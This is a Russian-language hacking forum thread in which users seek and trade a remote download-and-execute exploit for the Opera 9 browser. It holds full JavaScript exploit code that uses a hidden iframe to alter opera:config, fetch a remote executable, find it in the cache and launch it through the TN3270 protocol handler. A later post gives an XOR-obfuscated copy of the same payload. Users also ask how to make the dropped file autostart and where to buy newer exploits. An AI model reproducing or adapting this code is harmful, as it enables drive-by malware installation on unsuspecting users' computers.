Прошлую тему удалили модеры (не в том разделе видимо создал) Тут его уже выкладывали, но видимо старую тему с ним уже дельнули, ищу еще раз експлоит для оперы 9 версии (remote download & execution)
Этот? Code: <script> blank_iframe = document.createElement('iframe'); blank_iframe.src = 'about:blank'; blank_iframe.setAttribute('id', 'blank_iframe_window'); blank_iframe.setAttribute('style', 'display:none'); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\ config_iframe.setAttribute('id', 'config_iframe_window');\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement('script');\ cache_iframe = document.createElement('iframe');\ app_iframe.src = 'http://path/to/exe';\ app_iframe.onload = function ()\ {\ cache_iframe.src = 'opera:cache';\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute('href', 'tn3270://nothing');\ app_link.click();\ setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script>
Вот здесь видимо прописать путь к exe файлу: Code: app_iframe.src = 'http://path/to/exe';\ Не проверял, девятой оперы нема (( DrWeb запалил сплоит )))
вот .::Gh0st::. сказал что эксплоит скачал калькулятор но не запустил... а можно ли сделать так чтобы скачивалось в автозагрузку??
у меня этот сплоит норм работал месяца 2 назад тестил на себе опера 9.20 вроде грузил cmd все норм запускал,а потом бац не грузит хз вобщем из за чего это (((
опера 9.27 sploit Тут такой вопрос есть сплоит под эту версию у кого можно его достать или купить и за сколько?
с чего ты ваще взял что есть сплоит под оперу? и еси 9.27 то большенство юзеров обновляют и очень часто оперу. и сплоит под оперу...ваще впервые слышу
лазию с последней версией браузера у меня увели историю с квипа чел стукнул сам говорит в привате уже сплоит по эту версию есть попался я на ифрейме как он сказал сразу говорю что всякую дрянь я не открываю стоит аутпост который ничего не заподозрил sp3 тоже пробил да и еще нод с последними обновлениями
PHP: <script language=JavaScript>str = "cm`oj^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(: cm`oj^hgs`ld/rsb!<!&`cntu;cm`oj&: cm`oj^hgs`ld/rdu@uushctud)&he&-!&cm`oj^hgs`ld^vhoenv&(: cm`oj^hgs`ld/rdu@uushctud)&ruxmd&-!&ehrqm`x;onod&(: enbtldou/`qqdoeBihme)cm`oj^hgs`ld(: cm`oj^hgs`ld^vhoenv/dw`m!)#bnoghf^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] bnoghf^hgs`ld/rdu@uushctud)&he&-!&bnoghf^hgs`ld^vhoenv&(:] bnoghf^hgs`ld/rsb!<!&nqds`;bnoghf&:] enbtldou/`qqdoeBihme)bnoghf^hgs`ld(:] `qq^hgs`ld!<!enbtldou/bsd`udDmdldou)&rbshqu&(:] b`bid^hgs`ld!<!enbtldou/bsd`udDmdldou)&hgs`ld&(:] `qq^hgs`ld/rsb!<!&&:] `qq^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid^hgs`ld/rsb!<!&nqds`;b`bid&:] b`bid^hgs`ld/nomn`e!<!gtobuhno!)(] z] b`bid!<!b`bid^hgs`ld/bnoudouEnbtldou/bihmeOnedrZ1\/hoodsIULM/unTqqdsB`rd)(:] w`s!sd!<!odv!SdfDyq)&)NQS]]vz4|/DYD(]]r+]]e*]]r+";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script> Закриптовано следующее: PHP: blank_iframe = document.createElement('iframe');!blank_iframe.src = 'about:blank';!blank_iframe.setAttribute('id', 'blank_iframe_window');!blank_iframe.setAttribute('style', 'display:none');!document.appendChild(blank_iframe);!blank_iframe_window.eval ("config_iframe = document.createElement('iframe');\!config_iframe.setAttribute('id', 'config_iframe_window');\!config_iframe.src = 'opera:config';\!document.appendChild(config_iframe);\!app_iframe = document.createElement('script');\!cache_iframe = document.createElement('iframe');\!app_iframe.src = '';\!app_iframe.onload = function ()\!{\!cache_iframe.src = 'opera:cache';\!cache_iframe.onload = function ()\!{\!cache = cache_iframe.contentDocument.childNodes[0.innerHTML.toUpperCase();\!var re = new RegExp('(OPR\\w{5}.EXE)\\s*\\d+\\s* вообщем хз, то или не то. что нашел млин, тупля под вечер. забыл на дату поста посмотреть. все что выше - треш.
